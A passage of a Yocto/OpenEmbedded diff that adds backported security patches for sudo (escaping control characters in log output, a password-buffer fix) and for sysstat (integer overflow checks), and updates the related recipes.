#ifdef's (sigh). + */ +- sav = pass[8]; + pw_len = strlen(pw_epasswd); +- if (pw_len == DESLEN || HAS_AGEINFO(pw_epasswd, pw_len)) +- pass[8] = '\0'; ++ if (pw_len == DESLEN || HAS_AGEINFO(pw_epasswd, pw_len)) { ++ strlcpy(des_pass, pass, sizeof(des_pass)); ++ pass = des_pass; ++ } + + /* + * Normal UN*X password check. +@@ -88,7 +88,6 @@ sudo_passwd_verify(struct passwd *pw, char *pass, sudo_auth *auth, struct sudo_c + * only compare the first DESLEN characters in that case. + */ + epass = (char *) crypt(pass, pw_epasswd); +- pass[8] = sav; + if (epass != NULL) { + if (HAS_AGEINFO(pw_epasswd, pw_len) && strlen(epass) == DESLEN) + matched = !strncmp(pw_epasswd, epass, DESLEN); +-- +2.25.1 + diff --git a/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch new file mode 100644 index 0000000000..bc6f8c19a6 --- /dev/null +++ b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch @@ -0,0 +1,646 @@ +Origin: Backport obtained from SUSE. Thanks! + +From 334daf92b31b79ce68ed75e2ee14fca265f029ca Mon Sep 17 00:00:00 2001 +From: "Todd C. Miller" <Todd.Miller@sudo.ws> +Date: Wed, 18 Jan 2023 08:21:34 -0700 +Subject: [PATCH] Escape control characters in log messages and "sudoreplay -l" + output. The log message contains user-controlled strings that could include + things like terminal control characters. Space characters in the command + path are now also escaped. + +Command line arguments that contain spaces are surrounded with +single quotes and any literal single quote or backslash characters +are escaped with a backslash. This makes it possible to distinguish +multiple command line arguments from a single argument that contains +spaces. + +Issue found by Matthieu Barjole and Victor Cutillas of Synacktiv +(https://synacktiv.com). + +Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/sudo/tree/debian/patches/CVE-2023-2848x-1.patch?h=ubuntu/focal-security +Upstream commit https://github.com/sudo-project/sudo/commit/334daf92b31b79ce68ed75e2ee14fca265f029ca] +CVE: CVE-2023-28486 CVE-2023-28487 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + doc/sudoers.man.in | 33 +++++++-- + doc/sudoers.mdoc.in | 28 ++++++-- + doc/sudoreplay.man.in | 9 ++ + doc/sudoreplay.mdoc.in | 10 ++ + include/sudo_compat.h | 6 + + include/sudo_lbuf.h | 7 ++ + lib/util/lbuf.c | 106 +++++++++++++++++++++++++++++++ + lib/util/util.exp.in | 1 + plugins/sudoers/logging.c | 145 +++++++++++-------------------------------- + plugins/sudoers/sudoreplay.c | 44 +++++++++---- + 10 files changed, 257 insertions(+), 132 deletions(-) + +--- a/doc/sudoers.man.in ++++ b/doc/sudoers.man.in +@@ -4566,6 +4566,19 @@ can log events using either + syslog(3) + or a simple log file. + The log format is almost identical in both cases. ++Any control characters present in the log data are formatted in octal ++with a leading ++\(oq#\(cq ++character. ++For example, a horizontal tab is stored as ++\(oq#011\(cq ++and an embedded carriage return is stored as ++\(oq#015\(cq. ++In addition, space characters in the command path are stored as ++\(oq#040\(cq. ++Literal single quotes and backslash characters ++(\(oq\e\(cq) ++in command line arguments are escaped with a backslash. + .SS "Accepted command log entries" + Commands that sudo runs are logged using the following format (split + into multiple lines for readability): +@@ -4646,7 +4659,7 @@ A list of environment variables specifie + if specified. + .TP 14n + command +-The actual command that was executed. ++The actual command that was executed, including any command line arguments. + .PP + Messages are logged using the locale specified by + \fIsudoers_locale\fR, +@@ -4882,17 +4895,21 @@ with a few important differences: + 1.\& + The + \fIprogname\fR +-and +-\fIhostname\fR +-fields are not present. ++field is not present. + .TP 5n + 2.\& +-If the +-\fIlog_year\fR +-option is enabled, +-the date will also include the year. ++The ++\fIhostname\fR ++is only logged if the ++\fIlog_host\fR ++option is enabled. + .TP 5n + 3.\& ++The date does not include the year unless the ++\fIlog_year\fR ++option is enabled. ++.TP 5n ++4.\& + Lines that are longer than + \fIloglinelen\fR + characters (80 by default) are word-wrapped and continued on the +--- a/doc/sudoers.mdoc.in ++++ b/doc/sudoers.mdoc.in +@@ -4261,6 +4261,19 @@ can log events using either + .Xr syslog 3 + or a simple log file. + The log format is almost identical in both cases. ++Any control characters present in the log data are formatted in octal ++with a leading ++.Ql # ++character. ++For example, a horizontal tab is stored as ++.Ql #011 ++and an embedded carriage return is stored as ++.Ql #015 . ++In addition, space characters in the command path are stored as ++.Ql #040 . ++Literal single quotes and backslash characters ++.Pq Ql \e ++in command line arguments are escaped with a backslash. + .Ss Accepted command log entries + Commands that sudo runs are logged using the following format (split + into multiple lines for readability): +@@ -4328,7 +4341,7 @@ option is enabled. + A list of environment variables specified on the command line, + if specified. + .It command +-The actual command that was executed. ++The actual command that was executed, including any command line arguments. + .El + .Pp + Messages are logged using the locale specified by +@@ -4550,14 +4563,17 @@ with a few important differences: + .It + The + .Em progname +-and ++field is not present. ++.It ++The + .Em hostname +-fields are not present. ++is only logged if the ++.Em log_host ++option is enabled. + .It +-If the ++The date does not include the year unless the + .Em log_year +-option is enabled, +-the date will also include the year. ++option is enabled. + .It + Lines that are longer than + .Em loglinelen +--- a/doc/sudoreplay.man.in ++++ b/doc/sudoreplay.man.in +@@ -149,6 +149,15 @@ In this mode, + will list available sessions in a format similar to the + \fBsudo\fR + log file format, sorted by file name (or sequence number). ++Any control characters present in the log data are formated in octal ++with a leading ++\(oq#\(cq ++character. ++For example, a horizontal tab is displayed as ++\(oq#011\(cq ++and an embedded carriage return is displayed as ++\(oq#015\(cq. ++.sp + If a + \fIsearch expression\fR + is specified, it will be used to restrict the IDs that are displayed. +--- a/doc/sudoreplay.mdoc.in ++++ b/doc/sudoreplay.mdoc.in +@@ -142,6 +142,16 @@ In this mode, + will list available sessions in a format similar to the + .Nm sudo + log file format, sorted by file name (or sequence number). ++Any control characters present in the log data are formatted in octal ++with a leading ++.Ql # ++character. ++For example, a horizontal tab is displayed as ++.Ql #011 ++and an embedded carriage return is displayed as ++.Ql #015 . ++Space characters in the command name and arguments are also formatted in octal. ++.Pp + If a + .Ar search expression + is specified, it will be used to restrict the IDs that are displayed. +--- a/include/sudo_compat.h ++++ b/include/sudo_compat.h +@@ -79,6 +79,12 @@ + # endif + #endif + ++#ifdef HAVE_FALLTHROUGH_ATTRIBUTE ++# define FALLTHROUGH __attribute__((__fallthrough__)) ++#else ++# define FALLTHROUGH do { } while (0) ++#endif ++ + /* + * Given the pointer x to the member m of the struct s, return + * a pointer to the containing structure. +--- a/include/sudo_lbuf.h ++++ b/include/sudo_lbuf.h +@@ -36,9 +36,15 @@ struct sudo_lbuf { + + typedef int (*sudo_lbuf_output_t)(const char *); + ++/* Flags for sudo_lbuf_append_esc() */ ++#define LBUF_ESC_CNTRL 0x01 ++#define LBUF_ESC_BLANK 0x02 ++#define LBUF_ESC_QUOTE 0x04 ++ + __dso_public void sudo_lbuf_init_v1(struct sudo_lbuf *lbuf, sudo_lbuf_output_t output, int indent, const char *continuation, int cols); + __dso_public void sudo_lbuf_destroy_v1(struct sudo_lbuf *lbuf); + __dso_public bool sudo_lbuf_append_v1(struct sudo_lbuf *lbuf, const char *fmt, ...) __printflike(2, 3); ++__dso_public bool sudo_lbuf_append_esc_v1(struct sudo_lbuf *lbuf, int flags, const char *fmt, ...) __printflike(3, 4); + __dso_public bool sudo_lbuf_append_quoted_v1(struct sudo_lbuf *lbuf, const char *set, const char *fmt, ...) __printflike(3, 4); + __dso_public void sudo_lbuf_print_v1(struct sudo_lbuf *lbuf); + __dso_public bool sudo_lbuf_error_v1(struct sudo_lbuf *lbuf); +@@ -47,6 +53,7 @@ __dso_public void sudo_lbuf_clearerr_v1( + #define sudo_lbuf_init(_a, _b, _c, _d, _e) sudo_lbuf_init_v1((_a), (_b), (_c), (_d), (_e)) + #define sudo_lbuf_destroy(_a) sudo_lbuf_destroy_v1((_a)) + #define sudo_lbuf_append sudo_lbuf_append_v1 ++#define sudo_lbuf_append_esc sudo_lbuf_append_esc_v1 + #define sudo_lbuf_append_quoted sudo_lbuf_append_quoted_v1 + #define sudo_lbuf_print(_a) sudo_lbuf_print_v1((_a)) + #define sudo_lbuf_error(_a) sudo_lbuf_error_v1((_a)) +--- a/lib/util/lbuf.c ++++ b/lib/util/lbuf.c +@@ -93,6 +93,112 @@ sudo_lbuf_expand(struct sudo_lbuf *lbuf, + } + + /* ++ * Escape a character in octal form (#0n) and store it as a string ++ * in buf, which must have at least 6 bytes available. ++ * Returns the length of buf, not counting the terminating NUL byte. ++ */ ++static int ++escape(unsigned char ch, char *buf) ++{ ++ const int len = ch < 0100 ? (ch < 010 ? 3 : 4) : 5; ++ ++ /* Work backwards from the least significant digit to most significant. */ ++ switch (len) { ++ case 5: ++ buf[4] = (ch & 7) + '0'; ++ ch >>= 3; ++ FALLTHROUGH; ++ case 4: ++ buf[3] = (ch & 7) + '0'; ++ ch >>= 3; ++ FALLTHROUGH; ++ case 3: ++ buf[2] = (ch & 7) + '0'; ++ buf[1] = '0'; ++ buf[0] = '#'; ++ break; ++ } ++ buf[len] = '\0'; ++ ++ return len; ++} ++ ++/* ++ * Parse the format and append strings, only %s and %% escapes are supported. ++ * Any non-printable characters are escaped in octal as #0nn. ++ */ ++bool ++sudo_lbuf_append_esc_v1(struct sudo_lbuf *lbuf, int flags, const char *fmt, ...) ++{ ++ unsigned int saved_len = lbuf->len; ++ bool ret = false; ++ const char *s; ++ va_list ap; ++ debug_decl(sudo_lbuf_append_esc, SUDO_DEBUG_UTIL); ++ ++ if (sudo_lbuf_error(lbuf)) ++ debug_return_bool(false); ++ ++#define should_escape(ch) \ ++ ((ISSET(flags, LBUF_ESC_CNTRL) && iscntrl((unsigned char)ch)) || \ ++ (ISSET(flags, LBUF_ESC_BLANK) && isblank((unsigned char)ch))) ++#define should_quote(ch) \ ++ (ISSET(flags, LBUF_ESC_QUOTE) && (ch == '\'' || ch == '\\')) ++ ++ va_start(ap, fmt); ++ while (*fmt != '\0') { ++ if (fmt[0] == '%' && fmt[1] == 's') { ++ if ((s = va_arg(ap, char *)) == NULL) ++ s = "(NULL)"; ++ while (*s != '\0') { ++ if (should_escape(*s)) { ++ if (!sudo_lbuf_expand(lbuf, sizeof("#0177") - 1)) ++ goto done; ++ lbuf->len += escape(*s++, lbuf->buf + lbuf->len); ++ continue; ++ } ++ if (should_quote(*s)) { ++ if (!sudo_lbuf_expand(lbuf, 2)) ++ goto done; ++ lbuf->buf[lbuf->len++] = '\\'; ++ lbuf->buf[lbuf->len++] = *s++; ++ continue; ++ } ++ if (!sudo_lbuf_expand(lbuf, 1)) ++ goto done; ++ lbuf->buf[lbuf->len++] = *s++; ++ } ++ fmt += 2; ++ continue; ++ } ++ if (should_escape(*fmt)) { ++ if (!sudo_lbuf_expand(lbuf, sizeof("#0177") - 1)) ++ goto done; ++ if (*fmt == '\'') { ++ lbuf->buf[lbuf->len++] = '\\'; ++ lbuf->buf[lbuf->len++] = *fmt++; ++ } else { ++ lbuf->len += escape(*fmt++, lbuf->buf + lbuf->len); ++ } ++ continue; ++ } ++ if (!sudo_lbuf_expand(lbuf, 1)) ++ goto done; ++ lbuf->buf[lbuf->len++] = *fmt++; ++ } ++ ret = true; ++ ++done: ++ if (!ret) ++ lbuf->len = saved_len; ++ if (lbuf->size != 0) ++ lbuf->buf[lbuf->len] = '\0'; ++ va_end(ap); ++ ++ debug_return_bool(ret); ++} ++ ++/* + * Parse the format and append strings, only %s and %% escapes are supported. + * Any characters in set are quoted with a backslash. + */ +--- a/lib/util/util.exp.in ++++ b/lib/util/util.exp.in +@@ -79,6 +79,7 @@ sudo_gethostname_v1 + sudo_gettime_awake_v1 + sudo_gettime_mono_v1 + sudo_gettime_real_v1 ++sudo_lbuf_append_esc_v1 + sudo_lbuf_append_quoted_v1 + sudo_lbuf_append_v1 + sudo_lbuf_clearerr_v1 +--- a/plugins/sudoers/logging.c ++++ b/plugins/sudoers/logging.c +@@ -58,6 +58,7 @@ + #include <syslog.h> + + #include "sudoers.h" ++#include "sudo_lbuf.h" + + #ifndef HAVE_GETADDRINFO + # include "compat/getaddrinfo.h" +@@ -940,14 +941,6 @@ should_mail(int status) + (def_mail_no_perms && !ISSET(status, VALIDATE_SUCCESS))); + } + +-#define LL_TTY_STR "TTY=" +-#define LL_CWD_STR "PWD=" /* XXX - should be CWD= */ +-#define LL_USER_STR "USER=" +-#define LL_GROUP_STR "GROUP=" +-#define LL_ENV_STR "ENV=" +-#define LL_CMND_STR "COMMAND=" +-#define LL_TSID_STR "TSID=" +- + #define IS_SESSID(s) ( \ + isalnum((unsigned char)(s)[0]) && isalnum((unsigned char)(s)[1]) && \ + (s)[2] == '/' && \ +@@ -962,14 +955,16 @@ should_mail(int status) + static char * + new_logline(const char *message, const char *errstr) + { +- char *line = NULL, *evstr = NULL; + #ifndef SUDOERS_NO_SEQ + char sessid[7]; + #endif + const char *tsid = NULL; +- size_t len = 0; ++ struct sudo_lbuf lbuf; ++ int i; + debug_decl(new_logline, SUDOERS_DEBUG_LOGGING) + ++ sudo_lbuf_init(&lbuf, NULL, 0, NULL, 0); ++ + #ifndef SUDOERS_NO_SEQ + /* A TSID may be a sudoers-style session ID or a free-form string. */ + if (sudo_user.iolog_file != NULL) { +@@ -989,119 +984,55 @@ new_logline(const char *message, const c + #endif + + /* +- * Compute line length ++ * Format the log line as an lbuf, escaping control characters in ++ * octal form (#0nn). Error checking (ENOMEM) is done at the end. + */ +- if (message != NULL) +- len += strlen(message) + 3; +- if (errstr != NULL) +- len += strlen(errstr) + 3; +- len += sizeof(LL_TTY_STR) + 2 + strlen(user_tty); +- len += sizeof(LL_CWD_STR) + 2 + strlen(user_cwd); +- if (runas_pw != NULL) +- len += sizeof(LL_USER_STR) + 2 + strlen(runas_pw->pw_name); +- if (runas_gr != NULL) +- len += sizeof(LL_GROUP_STR) + 2 + strlen(runas_gr->gr_name); +- if (tsid != NULL) +- len += sizeof(LL_TSID_STR) + 2 + strlen(tsid); +- if (sudo_user.env_vars != NULL) { +- size_t evlen = 0; +- char * const *ep; +- +- for (ep = sudo_user.env_vars; *ep != NULL; ep++) +- evlen += strlen(*ep) + 1; +- if (evlen != 0) { +- if ((evstr = malloc(evlen)) == NULL) +- goto oom; +- evstr[0] = '\0'; +- for (ep = sudo_user.env_vars; *ep != NULL; ep++) { +- strlcat(evstr, *ep, evlen); +- strlcat(evstr, " ", evlen); /* NOTE: last one will fail */ +- } +- len += sizeof(LL_ENV_STR) + 2 + evlen; +- } +- } +- if (user_cmnd != NULL) { +- /* Note: we log "sudo -l command arg ..." as "list command arg ..." */ +- len += sizeof(LL_CMND_STR) - 1 + strlen(user_cmnd); +- if (ISSET(sudo_mode, MODE_CHECK)) +- len += sizeof("list ") - 1; +- if (user_args != NULL) +- len += strlen(user_args) + 1; +- } +- +- /* +- * Allocate and build up the line. +- */ +- if ((line = malloc(++len)) == NULL) +- goto oom; +- line[0] = '\0'; + + if (message != NULL) { +- if (strlcat(line, message, len) >= len || +- strlcat(line, errstr ? " : " : " ; ", len) >= len) +- goto toobig; ++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "%s%s", message, ++ errstr ? " : " : " ; "); + } + if (errstr != NULL) { +- if (strlcat(line, errstr, len) >= len || +- strlcat(line, " ; ", len) >= len) +- goto toobig; +- } +- if (strlcat(line, LL_TTY_STR, len) >= len || +- strlcat(line, user_tty, len) >= len || +- strlcat(line, " ; ", len) >= len) +- goto toobig; +- if (strlcat(line, LL_CWD_STR, len) >= len || +- strlcat(line, user_cwd, len) >= len || +- strlcat(line, " ; ", len) >= len) +- goto toobig; ++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "%s ; ", errstr); ++ } ++ if (user_tty != NULL) { ++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "TTY=%s ; ", user_tty); ++ } ++ if (user_cwd != NULL) { ++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "PWD=%s ; ", user_cwd); ++ } + if (runas_pw != NULL) { +- if (strlcat(line, LL_USER_STR, len) >= len || +- strlcat(line, runas_pw->pw_name, len) >= len || +- strlcat(line, " ; ", len) >= len) +- goto toobig; ++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "USER=%s ; ", ++ runas_pw->pw_name); + } + if (runas_gr != NULL) { +- if (strlcat(line, LL_GROUP_STR, len) >= len || +- strlcat(line, runas_gr->gr_name, len) >= len || +- strlcat(line, " ; ", len) >= len) +- goto toobig; ++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "GROUP=%s ; ", ++ runas_gr->gr_name); + } + if (tsid != NULL) { +- if (strlcat(line, LL_TSID_STR, len) >= len || +- strlcat(line, tsid, len) >= len || +- strlcat(line, " ; ", len) >= len) +- goto toobig; +- } +- if (evstr != NULL) { +- if (strlcat(line, LL_ENV_STR, len) >= len || +- strlcat(line, evstr, len) >= len || +- strlcat(line, " ; ", len) >= len) +- goto toobig; +- free(evstr); +- evstr = NULL; ++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "TSID=%s ; ", tsid); ++ } ++ if (sudo_user.env_vars != NULL) { ++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "ENV=%s", sudo_user.env_vars[0]); ++ for (i = 1; sudo_user.env_vars[i] != NULL; i++) { ++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, " %s", ++ sudo_user.env_vars[i]); ++ } + } + if (user_cmnd != NULL) { +- if (strlcat(line, LL_CMND_STR, len) >= len) +- goto toobig; +- if (ISSET(sudo_mode, MODE_CHECK) && strlcat(line, "list ", len) >= len) +- goto toobig; +- if (strlcat(line, user_cmnd, len) >= len) +- goto toobig; ++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL|LBUF_ESC_BLANK, ++ "COMMAND=%s", user_cmnd); + if (user_args != NULL) { +- if (strlcat(line, " ", len) >= len || +- strlcat(line, user_args, len) >= len) +- goto toobig; ++ sudo_lbuf_append_esc(&lbuf, ++ LBUF_ESC_CNTRL|LBUF_ESC_QUOTE, ++ " %s", user_args); + } + } + +- debug_return_str(line); +-oom: +- free(evstr); ++ if (!sudo_lbuf_error(&lbuf)) ++ debug_return_str(lbuf.buf); ++ ++ sudo_lbuf_destroy(&lbuf); + sudo_warnx(U_("%s: %s"), __func__, U_("unable to allocate memory")); + debug_return_str(NULL); +-toobig: +- free(evstr); +- free(line); +- sudo_warnx(U_("internal error, %s overflow"), __func__); +- debug_return_str(NULL); + } +--- a/plugins/sudoers/sudoreplay.c ++++ b/plugins/sudoers/sudoreplay.c +@@ -71,6 +71,7 @@ + #include "sudo_conf.h" + #include "sudo_debug.h" + #include "sudo_event.h" ++#include "sudo_lbuf.h" + #include "sudo_util.h" + + #ifdef HAVE_GETOPT_LONG +@@ -1353,7 +1354,8 @@ match_expr(struct search_node_list *head + } + + static int +-list_session(char *logfile, regex_t *re, const char *user, const char *tty) ++list_session(struct sudo_lbuf *lbuf, char *logfile, regex_t *re, ++ const char *user, const char *tty) + { + char idbuf[7], *idstr, *cp; + const char *timestr; +@@ -1386,16 +1388,32 @@ list_session(char *logfile, regex_t *re, + } + /* XXX - print rows + cols? */ + timestr = get_timestr(li->tstamp, 1); +- printf("%s : %s : TTY=%s ; CWD=%s ; USER=%s ; ", +- timestr ? timestr : "invalid date", +- li->user, li->tty, li->cwd, li->runas_user); +- if (li->runas_group) +- printf("GROUP=%s ; ", li->runas_group); +- printf("TSID=%s ; COMMAND=%s\n", idstr, li->cmd); +- +- ret = 0; +- ++ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "%s : %s : ", ++ timestr ? timestr : "invalid date", li->user); ++ if (li->tty != NULL) { ++ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "TTY=%s ; ", ++ li->tty); ++ } ++ if (li->cwd != NULL) { ++ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "CWD=%s ; ", ++ li->cwd); ++ } ++ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "USER=%s ; ", li->runas_user); ++ if (li->runas_group != NULL) { ++ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "GROUP=%s ; ", ++ li->runas_group); ++ } ++ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "TSID=%s ; ", idstr); ++ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "COMMAND=%s", ++ li->cmd); ++ ++ if (!sudo_lbuf_error(lbuf)) { ++ puts(lbuf->buf); ++ ret = 0; ++ } + done: ++ lbuf->error = 0; ++ lbuf->len = 0; + free_log_info(li); + debug_return_int(ret); + } +@@ -1415,6 +1433,7 @@ find_sessions(const char *dir, regex_t * + DIR *d; + struct dirent *dp; + struct stat sb; ++ struct sudo_lbuf lbuf; + size_t sdlen, sessions_len = 0, sessions_size = 0; + unsigned int i; + int len; +@@ -1426,6 +1445,8 @@ find_sessions(const char *dir, regex_t * + #endif + debug_decl(find_sessions, SUDO_DEBUG_UTIL) + ++ sudo_lbuf_init(&lbuf, NULL, 0, NULL, 0); ++ + d = opendir(dir); + if (d == NULL) + sudo_fatal(U_("unable to open %s"), dir); +@@ -1485,7 +1506,7 @@ find_sessions(const char *dir, regex_t * + + /* Check for dir with a log file. */ + if (lstat(pathbuf, &sb) == 0 && S_ISREG(sb.st_mode)) { +- list_session(pathbuf, re, user, tty); ++ list_session(&lbuf, pathbuf, re, user, tty); + } else { + /* Strip off "/log" and recurse if a dir. */ + pathbuf[sdlen + len - 4] = '\0'; +@@ -1496,6 +1517,7 @@ find_sessions(const char *dir, regex_t * + } + free(sessions); + } ++ sudo_lbuf_destroy(&lbuf); + + debug_return_int(0); + } diff --git a/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-2.patch b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-2.patch new file mode 100644 index 0000000000..d021873b70 --- /dev/null +++ b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-2.patch @@ -0,0 +1,26 @@ +Backport of: + +From 12648b4e0a8cf486480442efd52f0e0b6cab6e8b Mon Sep 17 00:00:00 2001 +From: "Todd C. Miller" <Todd.Miller@sudo.ws> +Date: Mon, 13 Mar 2023 08:04:32 -0600 +Subject: [PATCH] Add missing " ; " separator between environment variables and + command. This is a regression introduced in sudo 1.9.13. GitHub issue #254. + +Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/sudo/tree/debian/patches/CVE-2023-2848x-2.patch?h=ubuntu/focal-security +Upstream commit https://github.com/sudo-project/sudo/commit/12648b4e0a8cf486480442efd52f0e0b6cab6e8b] +CVE: CVE-2023-28486 CVE-2023-28487 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + lib/eventlog/eventlog.c | 1 + + 1 file changed, 1 insertion(+) + +--- a/plugins/sudoers/logging.c ++++ b/plugins/sudoers/logging.c +@@ -1018,6 +1018,7 @@ new_logline(const char *message, const c + sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, " %s", + sudo_user.env_vars[i]); + } ++ sudo_lbuf_append(&lbuf, " ; "); + } + if (user_cmnd != NULL) { + sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL|LBUF_ESC_BLANK, diff --git a/meta/recipes-extended/sudo/sudo_1.8.32.bb b/meta/recipes-extended/sudo/sudo_1.8.32.bb index 8d16ec2538..e35bbfa789 100644 --- a/meta/recipes-extended/sudo/sudo_1.8.32.bb +++ b/meta/recipes-extended/sudo/sudo_1.8.32.bb @@ -4,6 +4,10 @@ SRC_URI = "https://www.sudo.ws/dist/sudo-${PV}.tar.gz \ ${@bb.utils.contains('DISTRO_FEATURES', 'pam', '${PAM_SRC_URI}', '', d)} \ file://0001-Include-sys-types.h-for-id_t-definition.patch \ file://0001-Fix-includes-when-building-with-musl.patch \ + file://CVE-2022-43995.patch \ + file://CVE-2023-22809.patch \ + file://CVE-2023-28486_CVE-2023-28487-1.patch \ + file://CVE-2023-28486_CVE-2023-28487-2.patch \ " PAM_SRC_URI = "file://sudo.pam" diff --git a/meta/recipes-extended/sysklogd/sysklogd.inc b/meta/recipes-extended/sysklogd/sysklogd.inc index 8899daa1b0..e45b256bbe 100644 --- a/meta/recipes-extended/sysklogd/sysklogd.inc +++ b/meta/recipes-extended/sysklogd/sysklogd.inc @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=5b4be4b2549338526758ef479c040943 \ inherit update-rc.d update-alternatives systemd autotools -SRC_URI = "git://github.com/troglobit/sysklogd.git;nobranch=1 \ +SRC_URI = "git://github.com/troglobit/sysklogd.git;nobranch=1;protocol=https \ file://sysklogd \ file://0001-fix-one-rarely-reproduced-parallel-build-problem.patch \ " diff --git a/meta/recipes-extended/sysstat/sysstat/CVE-2022-39377.patch b/meta/recipes-extended/sysstat/sysstat/CVE-2022-39377.patch new file mode 100644 index 0000000000..972cc8938b --- /dev/null +++ b/meta/recipes-extended/sysstat/sysstat/CVE-2022-39377.patch @@ -0,0 +1,92 @@ +From 9c4eaf150662ad40607923389d4519bc83b93540 Mon Sep 17 00:00:00 2001 +From: Sebastien <seb@fedora-2.home> +Date: Sat, 15 Oct 2022 14:24:22 +0200 +Subject: [PATCH] Fix size_t overflow in sa_common.c (GHSL-2022-074) + +allocate_structures function located in sa_common.c insufficiently +checks bounds before arithmetic multiplication allowing for an +overflow in the size allocated for the buffer representing system +activities. + +This patch checks that the post-multiplied value is not greater than +UINT_MAX. + +Signed-off-by: Sebastien <seb@fedora-2.home> + +Upstream-Status: Backport [https://github.com/sysstat/sysstat/commit/9c4eaf150662ad40607923389d4519bc83b93540] +CVE : CVE-2022-39377 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + common.c | 25 +++++++++++++++++++++++++ + common.h | 2 ++ + sa_common.c | 6 ++++++ + 3 files changed, 33 insertions(+) + +diff --git a/common.c b/common.c +index ddfe75d..28d475e 100644 +--- a/common.c ++++ b/common.c +@@ -1528,4 +1528,29 @@ int parse_values(char *strargv, unsigned char bitmap[], int max_val, const char + + return 0; + } ++ ++/* ++ *************************************************************************** ++ * Check if the multiplication of the 3 values may be greater than UINT_MAX. ++ * ++ * IN: ++ * @val1 First value. ++ * @val2 Second value. ++ * @val3 Third value. ++ *************************************************************************** ++ */ ++void check_overflow(size_t val1, size_t val2, size_t val3) ++{ ++ if ((unsigned long long) val1 * ++ (unsigned long long) val2 * ++ (unsigned long long) val3 > UINT_MAX) { ++#ifdef DEBUG ++ fprintf(stderr, "%s: Overflow detected (%llu). Aborting...\n", ++ __FUNCTION__, ++ (unsigned long long) val1 * (unsigned long long) val2 * (unsigned long long) val3); ++#endif ++ exit(4); ++ } ++} ++ + #endif /* SOURCE_SADC undefined */ +diff --git a/common.h b/common.h +index 86905ba..75f837a 100644 +--- a/common.h ++++ b/common.h +@@ -249,6 +249,8 @@ int get_wwnid_from_pretty + (char *, unsigned long long *, unsigned int *); + + #ifndef SOURCE_SADC ++void check_overflow ++ (size_t, size_t, size_t); + int count_bits + (void *, int); + int count_csvalues +diff --git a/sa_common.c b/sa_common.c +index 8a03099..ff90c1f 100644 +--- a/sa_common.c ++++ b/sa_common.c +@@ -452,7 +452,13 @@ void allocate_structures(struct activity *act[]) + int i, j; + + for (i = 0; i < NR_ACT; i++) { ++ + if (act[i]->nr_ini > 0) { ++ ++ /* Look for a possible overflow */ ++ check_overflow((size_t) act[i]->msize, (size_t) act[i]->nr_ini, ++ (size_t) act[i]->nr2); ++ + for (j = 0; j < 3; j++) { + SREALLOC(act[i]->buf[j], void, + (size_t) act[i]->msize * (size_t) act[i]->nr_ini * (size_t) act[i]->nr2); +-- +2.25.1 + diff --git a/meta/recipes-extended/sysstat/sysstat/CVE-2023-33204.patch b/meta/recipes-extended/sysstat/sysstat/CVE-2023-33204.patch new file mode 100644 index 0000000000..9a27945a8b --- /dev/null +++ b/meta/recipes-extended/sysstat/sysstat/CVE-2023-33204.patch @@ -0,0 +1,46 @@ +Origin: https://github.com/opencontainers/runc/commit/6f8dc568e6ab072bb8205b732f04e685bf9237c0 +Reviewed-by: Sylvain Beucler <beuc@debian.org> +Last-Update: 2023-02-18 + +From 954ff2e2673cef48f0ed44668c466eab041db387 Mon Sep 17 00:00:00 2001 +From: Pavel Kopylov <pkopylov@cloudlinux.com> +Date: Wed, 17 May 2023 11:33:45 +0200 +Subject: [PATCH] Fix an overflow which is still possible for some values. + +CVE: CVE-2023-33204 +Upstream-Status: Backport [ upstream: https://github.com/sysstat/sysstat/commit/6f8dc568e6ab072bb8205b732f04e685bf9237c0 +debian: http://security.debian.org/debian-security/pool/updates/main/s/sysstat/sysstat_12.0.3-2+deb10u2.debian.tar.xz ] +Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com> + +--- + common.c | 7 +++++-- + 1 file changed, 5 insertions(+), 2 deletions(-) + +Index: sysstat-12.0.3/common.c +=================================================================== +--- sysstat-12.0.3.orig/common.c ++++ sysstat-12.0.3/common.c +@@ -1449,15 +1449,16 @@ int parse_values(char *strargv, unsigned + */ + void check_overflow(size_t val1, size_t val2, size_t val3) + { +- if ((unsigned long long) val1 * +- (unsigned long long) val2 * +- (unsigned long long) val3 > UINT_MAX) { ++ if ((val1 != 0) && (val2 != 0) && (val3 != 0) && ++ (((unsigned long long) UINT_MAX / (unsigned long long) val1 < ++ (unsigned long long) val2) || ++ ((unsigned long long) UINT_MAX / ((unsigned long long) val1 * (unsigned long long) val2) < ++ (unsigned long long) val3))) { + #ifdef DEBUG 